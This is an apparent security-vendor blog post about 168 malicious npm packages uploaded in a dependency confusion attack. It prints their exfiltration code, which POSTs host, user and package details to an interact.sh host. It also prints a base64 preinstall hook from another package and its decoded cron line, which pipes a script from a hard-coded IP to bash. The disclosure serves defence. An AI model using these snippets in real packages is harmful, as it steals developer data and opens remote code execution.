Single Author Uploaded 168 Packages to npm as Part of a Massive Dependency Confusion Attack

PSingle Author Uploaded 168 Packages To NPM
Table of Contents

Using Mend Supply Chain Defender, Mend’s research team reported and blocked dozens of packages from the same author. These packages targeted developers of many companies and frameworks like slack, Cloudflare, Datadog, Metamask, react, Shopify, OpenSea, Angular and more.

A dependency confusion attack takes advantage of a software developer’s tendency to pull malicious code from public repositories rather than internal ones. It is one of the most effective attack exploits, as it is very easy for a programmer to import a malicious package from an open source registry with an identical name to that which the programmer intended to use.

What happened?

One npm user named ​​’amgadesam007’ uploaded 168 packages to npm, targeting various different companies and frameworks. The actor was active from June 15 until he was taken down today, June 20. In this time frame, many packages were uploaded with names like:
‘slack-notifications’
‘Atomic-angular’
‘Cloudflare-docs-engine’
‘Datadog-app’
‘Metamask-state-log-explorer’
‘Shopify-marketplaces-buyer-app’
‘opensea-creatures’

As the first comment under index.js suggests, this is a security researcher under the name mega7 in HackerOne.

Although this is a security researcher, it does not change the fact that those packages are malicious. They collect sensitive information and send the information out with interactsh or piepedeam. 

All packages have a similar code and intend to exfiltrate user information:

const trackingData = JSON.stringify({
    p: package,
    c: __dirname,
    hd: os.homedir(),
    hn: os.hostname(),
    un: os.userInfo().username,
    dns: dns.getServers(),
    r: packageJSON ? packageJSON.___resolved : undefined,
    v: packageJSON.version,
    pjson: packageJSON,
});

var postData = querystring.stringify({
    msg: trackingData,
});

var options = {
    hostname: "cam9ar8b19p23s0tg6mgxppawdjkggiun.interact.sh", 
//replace burpcollaborator.net with Interactsh or pipedream
    port: 443,
    path: "/",
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": postData.length,
    },
};

In addition to the above attack, the Mend.io research team detected and reported the package (by another author) in version 1.0.3, that adds a remote shell connection to a crontab in base 64. Crontab is a tool for linux that allows the use of a job scheduler known as cron to execute tasks.

At the time of writing, this package is still live on npm.

 "preinstall": "node -e 
\"require('child_process').exec(Buffer.from('KCBjcm9udGFiIC1sOyBlY2hv
ICIqLzEgKiAqICogKiBjdXJsIC0tY29ubmVjdC10aW1lb3V0IDEwIGh0dHA6Ly80Ny45M
y4xMzMuNjQvbnBtLmpzb258YmFzaCAgPiAvZGV2L251bGwgMj4mMSIgKSB8IGNyb250YW
IK', 'base64').toString('ascii'))\""

Preinstall as part of package.json.

Decoded from base 64, we can understand the intention of the code:

( crontab -l; echo "*/1 * * * * curl --connect-timeout 10 
http://47.93.133.64/npm.json|bash  > /dev/null 2>&1" ) | crontab

It registers a new cron job that will try to establish a connection with a remote host and pipe the content to bash. Once that is successful a remote shell will be opened.

How to protect your organization from supply chain attacks

Supply chain attacks evolve and grow more frequent each day. Dependency confusion attack attempts are very common. The easiest way to protect this attack surface is to use an automated supply chain security solution such as Mend Supply Chain Defender that informs you when you import a malicious package from open source registries. 

Mend enterprise customers using JFrog Artifactory as a private repository manager can prevent malicious open source software from entering their code base using the Mend Supply Chain Defender Integration with JFrog Artifactory

Learn how Mend Supply Chain Defender blocks software supply chain attacks.

Manage open source application risk

Recent resources

Mend.io is a Strong Performer in the Forrester Wave™ Software Composition Analysis, Q4 2024

See why Mend.io is recognized as a Strong Performer in The Forrester Wave™ Software Composition Analysis (SCA) Q4 2024 report.

Read more

Mend.io & HeroDevs Partnership: Eliminate Risks in Deprecated Package

Announcing an exclusive partnership between Mend.io and HeroDevs to provide support for deprecated packages.

Read more

All About RAG: What It Is and How to Keep It Secure

Learn about retrieval-augmented generation, one complex AI system that developers are using.

Read more